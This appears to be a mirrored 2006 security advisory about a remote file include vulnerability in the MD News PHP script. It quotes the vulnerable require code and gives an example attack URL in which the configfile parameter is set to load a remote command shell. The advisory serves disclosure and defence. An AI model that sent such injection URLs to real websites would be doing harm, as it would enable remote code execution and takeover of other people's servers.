Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13117
HistoryJun 13, 2006 - 12:00 a.m.

MD News 1 Version - Remote File Include Vulnerabilities

2006-06-1300:00:00
vulners.com
9

SaVSaK.CoM | SpC-x - The-BeKiR |

MD News 1 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : MD News

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

$configfile = "config.php";

require $configfile;

Vulnerable :

http://www.victim.com/MD News/latest.php?configfile=Command-Shell